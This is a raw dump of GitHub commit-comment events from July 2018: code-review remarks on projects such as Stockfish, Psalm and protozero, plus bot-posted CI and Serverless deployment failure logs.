{"id":"7964945694","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707082,"position":null,"line":null,"path":null,"commit_id":"35b3ec18676951a79b1d308621bf91052759be06","created_at":"2018-07-14T00:56:59Z","updated_at":"2018-07-14T00:56:59Z","author_association":"NONE","body":"### Results for event id: ac757d75-ae53-448c-a7e0-1d78d1f8fae9\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42496 lines total):**\n\n```\n...\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Zip function: /usr/workspace/clone/packages/sample-http/.build/.webpack/sample-http [92 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-http/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Environment variable SLS_SNS_ERROR_TOPIC_ARN must contain string\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 188 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T00:56:59Z"}
{"id":"7964945776","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707083,"position":8,"line":6,"path":"pandas/0010_chausuyama/0083_ajisei.txt","commit_id":"bb8c5871fee9b184a10ae90e42ed377c687cba80","created_at":"2018-07-14T00:57:04Z","updated_at":"2018-07-14T00:57:04Z","author_association":"CONTRIBUTOR","body":"Ajisai"}},"created_at":"2018-07-14T00:57:04Z"}
{"id":"7964947809","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707088,"position":4,"line":4,"path":"pandas/0010_chausuyama/0083_ajisei.txt","commit_id":"bb8c5871fee9b184a10ae90e42ed377c687cba80","created_at":"2018-07-14T00:58:33Z","updated_at":"2018-07-14T00:58:33Z","author_association":"CONTRIBUTOR","body":"#17 Tama Zoo"}},"created_at":"2018-07-14T00:58:33Z"}
{"id":"7964950729","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29707103,"position":null,"line":null,"path":null,"commit_id":"31d76d99553e823f13a419c03cafa6f18a0442e6","created_at":"2018-07-14T01:00:28Z","updated_at":"2018-07-14T01:00:28Z","author_association":"OWNER","body":"Yes. I suspect that our blocked storm covers this well enough, but my first\ntry was yellow so i wanted to give it an extra shot.\n\nOn Fri, Jul 13, 2018, 6:52 PM Rocky640 <notifications@github.com> wrote:\n\n> BlockedStorm[2] is V(81) and applies to lever or not lever pawns.\n> The new value will soon be V(66) (but also suppose the other arrays are\n> adjusted too.)\n>\n> If we are to believe this is a good value\n> Then if your Thorned value is. say 35, then adjust BlockedStorm[2] by +-\n> 35 according to lever or not lever.\n> (or change BlockedStorm[2] by BlockedStorm[2] - 35 and use Thorned =70\n>\n> However, the possibility to create a lever (and open or semi open a file)\n> can only be good news for the attacker. So I would be surprised that a\n> special case for lever/not lever would make a difference.\n> If the lever is good for either side, it will soon disappear, else\n> something will move soon, especially close to the king...\n>\n> The other idea could be that our Storm stuff is only used for the midgame\n> score component.\n> However, BlockStorm[2] might be worth something in the endgame too.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/31d76d99553e823f13a419c03cafa6f18a0442e6#commitcomment-29707058>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSIAJ1sTbkqUSp8VBbsgLYxstBFS8ks5uGUDDgaJpZM4VPqcB>\n> .\n>\n"}},"created_at":"2018-07-14T01:00:28Z"}
{"id":"7964951596","type":"CommitCommentEvent","actor":{"login":"TysonAndre"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29707104,"position":6,"line":89,"path":"src/Psalm/Checker/ScopeChecker.php","commit_id":"1589b2a01e865a026328cc85a38264d478d5d7bf","created_at":"2018-07-14T01:01:03Z","updated_at":"2018-07-14T01:01:03Z","author_association":"CONTRIBUTOR","body":"This could be case insensitive, but I've never really seen it be anything but lowercase in code I've used."}},"created_at":"2018-07-14T01:01:03Z"}
{"id":"7964952350","type":"CommitCommentEvent","actor":{"login":"haggholm"},"repo":{"name":"DragonRaider5/react-intl"},"payload":{"comment":{"id":29707108,"position":66,"line":144,"path":"src/components/provider.js","commit_id":"33db3d28c20ede9050f7d241753a66ee17bb572a","created_at":"2018-07-14T01:01:34Z","updated_at":"2018-07-14T01:01:34Z","author_association":"NONE","body":"This can’t be right: there’s no `this` in a static method! I’m guessing you really want `nextProps.intl`?"}},"created_at":"2018-07-14T01:01:34Z"}
{"id":"7964952700","type":"CommitCommentEvent","actor":{"login":"geeknik"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707111,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T01:01:50Z","updated_at":"2018-07-14T01:01:50Z","author_association":"NONE","body":"How would I go about making the exceptions fail silently instead of tossing up a SIGABRT? My tests see that as a crash and we get overrun with false positive crashes.\r\n\r\n\r\n"}},"created_at":"2018-07-14T01:01:50Z"}
{"id":"7964952809","type":"CommitCommentEvent","actor":{"login":"muglug"},"repo":{"name":"vimeo/psalm"},"payload":{"comment":{"id":29707112,"position":6,"line":89,"path":"src/Psalm/Checker/ScopeChecker.php","commit_id":"1589b2a01e865a026328cc85a38264d478d5d7bf","created_at":"2018-07-14T01:01:55Z","updated_at":"2018-07-14T01:01:55Z","author_association":"MEMBER","body":"yeah, given that it's the most edge-casey thing ever I'm not going to lose sleep over it"}},"created_at":"2018-07-14T01:01:55Z"}
{"id":"7964953207","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29707113,"position":11,"line":11,"path":"package.json","commit_id":"a6985164e06441a50a23ec26c1c5abecfdde824e","created_at":"2018-07-14T01:02:11Z","updated_at":"2018-07-14T01:02:11Z","author_association":"MEMBER","body":"This is not acceptable for json format, it's just a placeholder."}},"created_at":"2018-07-14T01:02:11Z"}
{"id":"7964954828","type":"CommitCommentEvent","actor":{"login":"KnowtheStatusKuo"},"repo":{"name":"KnowtheStatusKuo/personal"},"payload":{"comment":{"id":29707118,"position":null,"line":null,"path":null,"commit_id":"d9eb7d0c13e42b0dda1618e1253e390ffe2389cf","created_at":"2018-07-14T01:03:21Z","updated_at":"2018-07-14T01:03:21Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-14T01:03:21Z"}
{"id":"7964957746","type":"CommitCommentEvent","actor":{"login":"kpengboy"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":29707122,"position":4,"line":14,"path":"modules/ocf_mesos/manifests/master/load_balancer/http_vhost.pp","commit_id":"74297fc39f7c32e976892a410486180045a832ac","created_at":"2018-07-14T01:05:27Z","updated_at":"2018-07-14T01:05:27Z","author_association":"MEMBER","body":"Eh, I thought it could've been useful to keep this. But whatever."}},"created_at":"2018-07-14T01:05:27Z"}
{"id":"7964961139","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707131,"position":null,"line":null,"path":null,"commit_id":"3ee75ad59c393cafbada58c9e19dfa504b31ea0d","created_at":"2018-07-14T01:08:05Z","updated_at":"2018-07-14T01:08:05Z","author_association":"NONE","body":"### Results for event id: 66302726-da74-43ca-92f1-589d65b6194e\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42476 lines total):**\n\n```\n...\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Zip function: /usr/workspace/clone/packages/sample-http/.build/.webpack/sample-http [111 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-http/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Could not locate deployment bucket. Error: AWS provider credentials not found. Learn how to set up AWS provider credentials in our docs here: <http://bit.ly/aws-creds-setup>.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 148 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T01:08:05Z"}
{"id":"7964961931","type":"CommitCommentEvent","actor":{"login":"BrOgBr"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29707135,"position":null,"line":null,"path":null,"commit_id":"cd05eb1500eaba2e6bb184754c6a49b1b654e81c","created_at":"2018-07-14T01:08:41Z","updated_at":"2018-07-14T01:08:41Z","author_association":"CONTRIBUTOR","body":"<img width=\"618\" alt=\"mobskill\" src=\"https://user-images.githubusercontent.com/34192842/42719266-2b3cba4c-86e9-11e8-9c67-9e5f11bd5564.png\">\r\n\r\nI really don't know why I'm having this error :(\r\nIs just with my emulator?"}},"created_at":"2018-07-14T01:08:41Z"}
{"id":"7964967646","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707152,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-14T01:12:48Z","updated_at":"2018-07-14T01:12:48Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T01:12:48Z"}
{"id":"7964973899","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707162,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T01:17:09Z","updated_at":"2018-07-14T01:17:09Z","author_association":"MEMBER","body":"@geeknik - are you able to add a try/catch perhaps around your testing code? I presume the SIGABRT is because the `throw` is happening without a catch somewhere."}},"created_at":"2018-07-14T01:17:09Z"}
{"id":"7964975125","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29707166,"position":null,"line":null,"path":null,"commit_id":"d9f75d93496eef94f8b8a5c604533dfd676e36e6","created_at":"2018-07-14T01:18:06Z","updated_at":"2018-07-14T01:18:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [unity crash when wood bomb fell between two woods after creation](https://trello.com/c/DtDtDLWo/46-unity-crash-when-wood-bomb-fell-between-two-woods-after-creation)"}},"created_at":"2018-07-14T01:18:06Z"}
{"id":"7964975417","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29707167,"position":null,"line":null,"path":null,"commit_id":"d9f75d93496eef94f8b8a5c604533dfd676e36e6","created_at":"2018-07-14T01:18:22Z","updated_at":"2018-07-14T01:18:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [sometimes the game stops (collapse not performed fully) when an ultimate is created](https://trello.com/c/QTOjle38/44-sometimes-the-game-stops-collapse-not-performed-fully-when-an-ultimate-is-created)"}},"created_at":"2018-07-14T01:18:22Z"}
{"id":"7964975562","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29707168,"position":null,"line":null,"path":null,"commit_id":"d9f75d93496eef94f8b8a5c604533dfd676e36e6","created_at":"2018-07-14T01:18:29Z","updated_at":"2018-07-14T01:18:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [implement special combinations](https://trello.com/c/6woEItn2/22-implement-special-combinations)"}},"created_at":"2018-07-14T01:18:29Z"}
{"id":"7964976959","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707174,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-14T01:19:37Z","updated_at":"2018-07-14T01:19:37Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T01:19:37Z"}
{"id":"7964978502","type":"CommitCommentEvent","actor":{"login":"whitedragon0000"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29707181,"position":null,"line":null,"path":null,"commit_id":"902ca32b8c4d9c5d9338afca441719e3fdf0f41c","created_at":"2018-07-14T01:20:49Z","updated_at":"2018-07-14T01:20:49Z","author_association":"COLLABORATOR","body":"Hi!! Well level_completed_defeating_boss is just a boolean flag that tell you if you completed a level defeating a boss ;-)\r\nIt's just an openbor internal value (not available via script). It's useful to write the victory pose animation.\r\nSo we have new animations into openbor engine at moment:\r\nducking\r\nduckrise\r\nedge\r\nloose\r\nvictory\r\nand... all backpains: added backblockpain/backrise/backriseattack\r\n\r\nThis is a present for you before my regards!! ;-)"}},"created_at":"2018-07-14T01:20:49Z"}
{"id":"7964978946","type":"CommitCommentEvent","actor":{"login":"tinder-davidknight"},"repo":{"name":"lyft/scissors"},"payload":{"comment":{"id":29707182,"position":3,"line":2,"path":"gradle.properties","commit_id":"63816890f67a5c1d6289b1303f1510e2f3deb332","created_at":"2018-07-14T01:21:11Z","updated_at":"2018-07-14T01:21:11Z","author_association":"NONE","body":"please deploy this version to maven or sonartype"}},"created_at":"2018-07-14T01:21:11Z"}
{"id":"7964988457","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707211,"position":null,"line":null,"path":null,"commit_id":"b8472e40b7ea33fd4494fd4ce640253a7974e45d","created_at":"2018-07-14T01:28:54Z","updated_at":"2018-07-14T01:28:54Z","author_association":"NONE","body":"### Results for event id: a4d4c3ef-a441-42b6-a940-f1f0568d015f\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42476 lines total):**\n\n```\n...\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Zip function: /usr/workspace/clone/packages/sample-http/.build/.webpack/sample-http [88 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-http/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Could not locate deployment bucket. Error: AWS provider credentials not found. Learn how to set up AWS provider credentials in our docs here: <http://bit.ly/aws-creds-setup>.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 155 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T01:28:54Z"}
{"id":"7964991837","type":"CommitCommentEvent","actor":{"login":"CharlesVincentAnderson"},"repo":{"name":"CharlesVincentAnderson/DaysBetweenGUI"},"payload":{"comment":{"id":29707219,"position":null,"line":null,"path":null,"commit_id":"51459c510e9ee8e2e2df5358bb88f7f304aaee6f","created_at":"2018-07-14T01:31:22Z","updated_at":"2018-07-14T01:31:22Z","author_association":"OWNER","body":"The first program is a Gui that starts with a button which, when pushed, opens a second window. The second window allows the user to input two dates then calculates and displays the number of days in between."}},"created_at":"2018-07-14T01:31:22Z"}
{"id":"7964994926","type":"CommitCommentEvent","actor":{"login":"Bruno-Bernardo"},"repo":{"name":"DavidDimon/achado-perdido"},"payload":{"comment":{"id":29707227,"position":null,"line":null,"path":null,"commit_id":"7a66cabe841ab061d9800be165f81c926d327be2","created_at":"2018-07-14T01:33:57Z","updated_at":"2018-07-14T01:33:57Z","author_association":"COLLABORATOR","body":"Esses comando em sql não servem pra nada pois já há a persistência jpa."}},"created_at":"2018-07-14T01:33:57Z"}
{"id":"7964995519","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29707228,"position":null,"line":null,"path":null,"commit_id":"27e6fd29f48ae9a3a591de798bfe164c4d4e6220","created_at":"2018-07-14T01:34:26Z","updated_at":"2018-07-14T01:34:26Z","author_association":"OWNER","body":"Fixes #7?"}},"created_at":"2018-07-14T01:34:26Z"}
{"id":"7964995925","type":"CommitCommentEvent","actor":{"login":"zonyitoo"},"repo":{"name":"zonyitoo/memcached-rs"},"payload":{"comment":{"id":29707229,"position":null,"line":null,"path":null,"commit_id":"fe62a69faa869fdce1d4ffdbb5a9df96a4493b0c","created_at":"2018-07-14T01:34:48Z","updated_at":"2018-07-14T01:34:48Z","author_association":"OWNER","body":"Indeed."}},"created_at":"2018-07-14T01:34:48Z"}
{"id":"7964996237","type":"CommitCommentEvent","actor":{"login":"rbg1234"},"repo":{"name":"rbg1234/testing"},"payload":{"comment":{"id":29707230,"position":null,"line":null,"path":null,"commit_id":"7cd349eb25d70080f6d42846e928deb3605b582f","created_at":"2018-07-14T01:35:07Z","updated_at":"2018-07-14T01:35:07Z","author_association":"OWNER","body":"good job ryan"}},"created_at":"2018-07-14T01:35:07Z"}
{"id":"7964998214","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707241,"position":9,"line":9,"path":"pandas/0017_tama/0107_fanfan.txt","commit_id":"a9024438945ad99b2d8d4cdd9c7c4f394cd1772e","created_at":"2018-07-14T01:36:46Z","updated_at":"2018-07-14T01:36:46Z","author_association":"CONTRIBUTOR","body":"F\r\nFanfan is a female!"}},"created_at":"2018-07-14T01:36:46Z"}
{"id":"7965001626","type":"CommitCommentEvent","actor":{"login":"geeknik"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707251,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T01:39:40Z","updated_at":"2018-07-14T01:39:40Z","author_association":"NONE","body":"That's perfect. Thank you."}},"created_at":"2018-07-14T01:39:40Z"}
{"id":"7965003038","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29707254,"position":null,"line":null,"path":null,"commit_id":"9ccb5df49f8e093bc55e566f3abd3308a011f174","created_at":"2018-07-14T01:40:50Z","updated_at":"2018-07-14T01:40:50Z","author_association":"NONE","body":"@pb00068 If you look at the diff against master, I think, the multiplication is not there.  (It was added in a previous commit on this branch, and then removed again by this one.)  So the division by 2 could be considered added complexity, since it's not replacing anything in particular.\r\n\r\nI still don't think that adding `/ 2` somewhere is added complexity--it's trivial--but it's probably the reason this was submitted with [0, 5] rather than [0, 4].  It seems very close to passing [0, 5], which suggests it would pass [0, 4].\r\n\r\nIf I recall correctly, there was a patch that added a single addition/subtraction but passed [0, 4] and was committed...but I don't recall what it was."}},"created_at":"2018-07-14T01:40:50Z"}
{"id":"7965004143","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29707255,"position":null,"line":null,"path":null,"commit_id":"118517c7e47e9e8f3627ff33d6b2aa7ceb1db786","created_at":"2018-07-14T01:41:45Z","updated_at":"2018-07-14T01:41:45Z","author_association":"NONE","body":"### Results for event id: a6acd522-e872-4701-9d28-ef04a969b2e9\n<details><summary>DockerServerless : Deploy to Lambda (d7f9ab) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (42476 lines total):**\n\n```\n...\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Zip function: /usr/workspace/clone/packages/sample-http/.build/.webpack/sample-http [96 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-http/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Could not locate deployment bucket. Error: The AWS Access Key Id you provided does not exist in our records.\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-http\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 152 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-14T01:41:45Z"}
{"id":"7965004805","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707256,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-14T01:42:17Z","updated_at":"2018-07-14T01:42:17Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T01:42:17Z"}
{"id":"7965006028","type":"CommitCommentEvent","actor":{"login":"corytortoise"},"repo":{"name":"TurtleTeam/DuelsPE"},"payload":{"comment":{"id":29707257,"position":null,"line":null,"path":null,"commit_id":"c3a6ae416ed538d2ce6f14902a899c5a1919461f","created_at":"2018-07-14T01:43:17Z","updated_at":"2018-07-14T01:43:17Z","author_association":"CONTRIBUTOR","body":"Removed CheckTask because GameTimer can handle it, and it avoids needing an extra task running every second."}},"created_at":"2018-07-14T01:43:17Z"}
{"id":"7965007717","type":"CommitCommentEvent","actor":{"login":"ireeene1"},"repo":{"name":"ireeene1/testall"},"payload":{"comment":{"id":29707262,"position":1,"line":1,"path":"index.md","commit_id":"6b90f3bc249a00047042fed7ce796ee68647db44","created_at":"2018-07-14T01:44:40Z","updated_at":"2018-07-14T01:44:40Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-14T01:44:40Z"}
{"id":"7965007871","type":"CommitCommentEvent","actor":{"login":"ireeene1"},"repo":{"name":"ireeene1/testall"},"payload":{"comment":{"id":29707263,"position":1,"line":1,"path":"index.md","commit_id":"6b90f3bc249a00047042fed7ce796ee68647db44","created_at":"2018-07-14T01:44:48Z","updated_at":"2018-07-14T01:44:48Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-14T01:44:48Z"}
{"id":"7965012687","type":"CommitCommentEvent","actor":{"login":"TianXingchen"},"repo":{"name":"TianXingchen/ubiquitous-computing-machine"},"payload":{"comment":{"id":29707271,"position":22,"line":22,"path":"README.md","commit_id":"1c236d88d14e494c2e1305139ac794222d8fcbb6","created_at":"2018-07-14T01:48:53Z","updated_at":"2018-07-14T01:48:53Z","author_association":"OWNER","body":"int a;"}},"created_at":"2018-07-14T01:48:53Z"}
{"id":"7965012898","type":"CommitCommentEvent","actor":{"login":"wwtalwtaw"},"repo":{"name":"yd-yin/Deep_Learning"},"payload":{"comment":{"id":29707272,"position":null,"line":null,"path":null,"commit_id":"562c921b6bb5318c30e3e8ac99dd7ff7fb6645ea","created_at":"2018-07-14T01:49:04Z","updated_at":"2018-07-14T01:49:04Z","author_association":"NONE","body":"你接下来可以看看这两篇论文：\r\n1. Learning Free-Form Deformations for 3D Object Reconstruction\r\n2. Using Locally Corresponding CAD Models for Dense 3D Reconstructions from a Single Image"}},"created_at":"2018-07-14T01:49:04Z"}
{"id":"7965013298","type":"CommitCommentEvent","actor":{"login":"purcell"},"repo":{"name":"purcell/color-theme-sanityinc-tomorrow"},"payload":{"comment":{"id":29707273,"position":null,"line":null,"path":null,"commit_id":"2654ffe584d104d631ca27a526c65002532e25c9","created_at":"2018-07-14T01:49:26Z","updated_at":"2018-07-14T01:49:26Z","author_association":"OWNER","body":"Thanks. I used to make this face *much* more visible, but it got annoying. Recently I was finding that it was too hard to see. It's difficult to find the right balance!"}},"created_at":"2018-07-14T01:49:26Z"}
{"id":"7965013692","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29707274,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-14T01:49:45Z","updated_at":"2018-07-14T01:49:45Z","author_association":"CONTRIBUTOR","body":"The version of propchar() that is in typotests is the one I thought n-t-roff had been updated to.  It was a second proposal, but it is described in the propchar() issue.\n\nI'll upload another User's Manual when I check why the line breaks are not the same in those four areas--I need to understand that first.  The TeX Gyre Termes fonts used for the User's Manual are free OpenType versions of Times Roman.  They can be downloaded from ctan.org/pkg/tex-gyre-termes or www.gust.org.pl/projects/e-foundry/tex-gyre/termes.  (Don't use the version from fontsquirrel.com, it is out of date.)"}},"created_at":"2018-07-14T01:49:45Z"}
{"id":"7965014398","type":"CommitCommentEvent","actor":{"login":"rongjiecomputer"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29707275,"position":659,"line":1927,"path":"third_party/llvm/llvm.autogenerated.BUILD","commit_id":"add96c8632df9596a73bf637d6b7015e9c7beaad","created_at":"2018-07-14T01:50:19Z","updated_at":"2018-07-14T01:50:19Z","author_association":"CONTRIBUTOR","body":"@sanjoy Sorry, should be\r\n\r\n```python\r\ndef llvm_support_platform_specific_srcs_glob():\r\n    return select({\r\n        \"@org_tensorflow//tensorflow:windows\": native.glob([\r\n            \"lib/Support/Windows/*.inc\",\r\n            \"lib/Support/Windows/*.h\"\r\n        ]),\r\n        \"//conditions:default\": native.glob([\r\n            \"lib/Support/Unix/*.inc\",\r\n            \"lib/Support/Unix/*.h\",\r\n        ]),\r\n    })\r\n```"}},"created_at":"2018-07-14T01:50:19Z"}
